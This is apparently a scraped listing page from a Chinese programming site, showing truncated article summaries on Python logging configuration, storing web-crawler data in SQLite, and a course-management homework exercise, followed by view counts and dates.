Python Logging原來(lái)真的遠(yuǎn)比我想象的要復(fù)雜很多很多,學(xué)習(xí)路線堪比git。但是又繞不過(guò)去,alternatives又少,所以必須要予以重視,踏踏實(shí)實(shí)認(rèn)認(rèn)真真的來(lái)好好學(xué)學(xué)才行。 學(xué)習(xí)Logging的目的:簡(jiǎn)單腳本還好,print足夠。但是稍微復(fù)雜點(diǎn),哪怕是三四個(gè)文件加起來(lái)兩三百行代碼,調(diào)試也開始變復(fù)雜起來(lái)了。再加上如果是后臺(tái)長(zhǎng)期運(yùn)行的那種腳本,運(yùn)行信息的調(diào)查更是復(fù)雜起來(lái)。一開始我還在各種查...
摘要:,引言自帶一個(gè)輕量級(jí)的關(guān)系型數(shù)據(jù)庫(kù)。作為后端數(shù)據(jù)庫(kù),可以搭配建網(wǎng)站,或者為網(wǎng)絡(luò)爬蟲存儲(chǔ)數(shù)據(jù)。在一些場(chǎng)景下,網(wǎng)絡(luò)爬蟲可以使用存儲(chǔ)采集到的網(wǎng)頁(yè)信息。爬蟲打數(shù)機(jī)將在版本支持,不妨想想一下網(wǎng)絡(luò)爬蟲與打數(shù)機(jī)連接在一起會(huì)怎樣。 showImg(https://segmentfault.com/img/bVyUfA); 1,引言 Python自帶一個(gè)輕量級(jí)的關(guān)系型數(shù)據(jù)庫(kù)SQLite。這一數(shù)據(jù)庫(kù)使用S...
摘要:先來(lái)一段程序告知怎樣配置日志。指定日期時(shí)間格式。需要說(shuō)明的是,和不能同時(shí)提供,否則會(huì)引發(fā)異常中新添加的配置項(xiàng)。 先來(lái)一段程序告知python怎樣配置日志。 logging.basicConfig(level=logging.DEBUG) # 設(shè)置日志級(jí)別 # 創(chuàng)建日志記錄器,指明日志保存的路徑、每個(gè)日志文件的最大大小、保存的日志文件個(gè)數(shù)上限 file_log_handler = Ro...
摘要:如上海北京等管理員自己創(chuàng)建其他地方的學(xué)校管理員創(chuàng)建的課程。包含名字性別年齡等學(xué)員查詢可上課程學(xué)員選課,選擇學(xué)校課程,并付款。課程價(jià)格,周期課程價(jià)格,周期課程價(jià)格,周期創(chuàng)建講師屬于北京校區(qū),屬于上海校區(qū)。 作業(yè)需求 創(chuàng)建北京、上海 2 所學(xué)校 創(chuàng)建linux , python , go 3個(gè)課程,linuxpy在北京開, go 在上海開 課程包含,周期,價(jià)格,通過(guò)學(xué)校創(chuàng)建課程 通過(guò)學(xué)校...
閱讀 1633·2021-11-23 09:51
閱讀 1157·2021-10-12 10:12
閱讀 2920·2021-09-22 16:06
閱讀 3729·2019-08-30 15:56
閱讀 3558·2019-08-30 15:53
閱讀 3181·2019-08-29 16:29
閱讀 2420·2019-08-29 15:27
閱讀 2122·2019-08-26 10:49